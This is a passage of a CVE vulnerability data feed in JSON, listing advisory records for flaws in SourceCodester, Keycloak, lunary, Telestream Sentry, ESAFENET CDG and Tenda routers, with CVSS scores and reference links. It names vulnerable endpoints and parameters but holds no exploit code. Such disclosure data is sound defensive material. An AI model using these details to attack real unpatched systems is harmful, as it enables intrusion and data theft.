"2024-11-08T07:15Z", "lastModifiedDate" : "2024-11-13T17:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1027", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252300", "name" : "https://vuldb.com/?ctiid.252300", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252300", "name" : "https://vuldb.com/?id.252300", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252300", "name" : "https://vuldb.com/?ctiid.252300", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252300", "name" : "https://vuldb.com/?id.252300", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in SourceCodester Facebook News Feed Like 1.0. Affected is an unknown function of the component Post Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-252300." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:facebook_news_feed_like:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-30T03:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10270", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:10175", "name" : "RHSA-2024:10175", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:10176", "name" : "RHSA-2024:10176", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:10177", "name" : "RHSA-2024:10177", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:10178", "name" : "RHSA-2024:10178", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-10270", "name" : "https://access.redhat.com/security/cve/CVE-2024-10270", "refsource" : "", "tags" : [ ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2321214", "name" : "RHBZ#2321214", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in the Keycloak-services package. If untrusted data is passed to the SearchQueryUtils method, it could lead to a denial of service (DoS) scenario by exhausting system resources due to a Regex complexity." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-25T08:15Z", "lastModifiedDate" : "2024-11-25T08:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10272", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e", "name" : "https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/3de48a54-b5c9-40a1-b794-d59c36d58fb6", "name" : "https://huntr.com/bounties/3de48a54-b5c9-40a1-b794-d59c36d58fb6", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/3de48a54-b5c9-40a1-b794-d59c36d58fb6", "name" : "https://huntr.com/bounties/3de48a54-b5c9-40a1-b794-d59c36d58fb6", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "lunary-ai/lunary is vulnerable to broken access control in the latest version. An attacker can view the content of any dataset without any kind of authorization by sending a GET request to the /v1/datasets endpoint without a valid authorization token." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lunary:lunary:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.4.9", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-06-20T15:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10273", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-269" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "name" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/883d9fe2-5730-41e1-a5c2-59972489876e", "name" : "https://huntr.com/bounties/883d9fe2-5730-41e1-a5c2-59972489876e", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In lunary-ai/lunary v1.5.0, improper privilege management in the models.ts file allows users with viewer roles to modify models owned by others. The PATCH endpoint for models does not have appropriate privilege checks, enabling low-privilege users to update models they should not have access to modify. This vulnerability could lead to unauthorized changes in critical resources, affecting the integrity and reliability of the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lunary:lunary:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.7", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-02T19:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10274", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-285" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "name" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/506459c1-da60-45c5-a10d-8bd540a4b4c1", "name" : "https://huntr.com/bounties/506459c1-da60-45c5-a10d-8bd540a4b4c1", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An improper authorization vulnerability exists in lunary-ai/lunary version 1.5.5. The /users/me/org endpoint lacks adequate access control mechanisms, allowing unauthorized users to access sensitive information about all team members in the current organization. This vulnerability can lead to the disclosure of sensitive information such as names, roles, or emails to users without sufficient privileges, resulting in privacy violations and potential reconnaissance for targeted attacks." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lunary:lunary:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.7", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-02T19:36Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10275", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-284" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "name" : "https://github.com/lunary-ai/lunary/commit/8ba1b8ba2c2c30b1cec30eb5777c1fda670cbbfc", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/863ee34b-c4c6-4325-bf7a-82a7feebf88f", "name" : "https://huntr.com/bounties/863ee34b-c4c6-4325-bf7a-82a7feebf88f", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In version 1.5.5 of lunary-ai/lunary, a vulnerability exists where admins, who do not have direct permissions to access billing resources, can change the permissions of existing users to include billing permissions. This can lead to a privilege escalation scenario where an administrator can manage billing, effectively bypassing the intended role-based access control. Only users with the 'owner' role should be allowed to invite members with billing permissions. This flaw allows admins to circumvent those restrictions, gaining unauthorized access and control over billing information, posing a risk to the organization’s financial resources." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lunary:lunary:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.7", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-02T19:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10276", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.281551", "name" : "VDB-281551 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281551", "name" : "VDB-281551 | Telestream Sentry Reports Page page cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.423695", "name" : "Submit #423695 | Tektronix Sentry 6.0.9 Cross Site Scripting", "refsource" : "", "tags" : [ "Exploit", "Mitigation", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Telestream Sentry 6.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /?page=reports of the component Reports Page. The manipulation of the argument z leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:telestream:sentry:6.0.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-23T11:15Z", "lastModifiedDate" : "2025-05-01T14:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10277", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/510c9ef1-8bb9-4c8f-9648-2ea6ee726b06?code=G8A6P3", "name" : "https://flowus.cn/share/510c9ef1-8bb9-4c8f-9648-2ea6ee726b06?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281552", "name" : "VDB-281552 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281552", "name" : "VDB-281552 | ESAFENET CDG UsbKeyAjax.java sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.423830", "name" : "Submit #423830 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5 and classified as critical. Affected by this issue is some unknown functionality of the file /com/esafenet/servlet/ajax/UsbKeyAjax.java. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T12:15Z", "lastModifiedDate" : "2024-11-04T22:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10278", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/cdfbea40-da0c-4fe7-a4b8-86631f0fd796?code=G8A6P3", "name" : "https://flowus.cn/share/cdfbea40-da0c-4fe7-a4b8-86631f0fd796?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281553", "name" : "VDB-281553 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281553", "name" : "VDB-281553 | ESAFENET CDG ReUserOrganiseService.java sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.423831", "name" : "Submit #423831 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5. It has been classified as critical. This affects an unknown part of the file /com/esafenet/servlet/user/ReUserOrganiseService.java. The manipulation of the argument userId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T13:15Z", "lastModifiedDate" : "2024-11-04T22:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10279", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/b04c63c7-5b3c-47d2-9159-43943aecc342?code=G8A6P3", "name" : "https://flowus.cn/share/b04c63c7-5b3c-47d2-9159-43943aecc342?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281554", "name" : "VDB-281554 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281554", "name" : "VDB-281554 | ESAFENET CDG PrintPolicyService.java sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.423832", "name" : "Submit #423832 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5. It has been declared as critical. This vulnerability affects unknown code of the file /com/esafenet/servlet/policy/PrintPolicyService.java. The manipulation of the argument policyId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-23T13:15Z", "lastModifiedDate" : "2024-11-04T22:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1028", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252301", "name" : "https://vuldb.com/?ctiid.252301", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252301", "name" : "https://vuldb.com/?id.252301", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252301", "name" : "https://vuldb.com/?ctiid.252301", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252301", "name" : "https://vuldb.com/?id.252301", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Post Handler. The manipulation of the argument Description with the input HACKED leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252301 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:facebook_news_feed_like:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-30T05:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10280", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-476" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/JohenanLi/router_vuls/blob/main/websReadEvent/websReadEvent.md", "name" : "https://github.com/JohenanLi/router_vuls/blob/main/websReadEvent/websReadEvent.md", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281555", "name" : "VDB-281555 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281555", "name" : "VDB-281555 | Tenda AC6/AC7/AC8/AC9/AC10/AC10U/AC15/AC18/AC500/AC1206 GetIPTV websReadEvent null pointer dereference", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.426417", "name" : "Submit #426417 | Tenda AC8v4 V16.03.34.06 NULL Pointer Dereference", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda AC6, AC7, AC8, AC9, AC10, AC10U, AC15, AC18, AC500 and AC1206 up to 20241022. It has been rated as problematic. This issue affects the function websReadEvent of the file /goform/GetIPTV. The manipulation of the argument Content-Length leads to null pointer dereference. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac15_firmware:15.03.05.18:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac15_firmware:15.03.05.19:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac15:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac7_firmware:15.03.06.44:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac7:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac10u_firmware:15.03.06.48:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac10u_firmware:15.03.06.49:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac10u:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac500_firmware:1.0.0.14:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac500_firmware:1.0.0.16:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac500_firmware:2.0.1.9\\(1307\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac18_firmware:15.03.05.05:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac18_firmware:15.03.05.19\\(6318\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac18:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac9_firmware:15.03.2.13:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac9_firmware:15.03.05.14:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac9_firmware:15.03.05.19\\(6318\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac9:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac9_firmware:15.03.06.42:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac9:3.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac1206_firmware:15.03.06.23:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac1206:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac6_firmware:15.03.06.23:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac6:2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac10_firmware:16.03.10.13:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac10_firmware:16.03.10.20:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac10:4.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 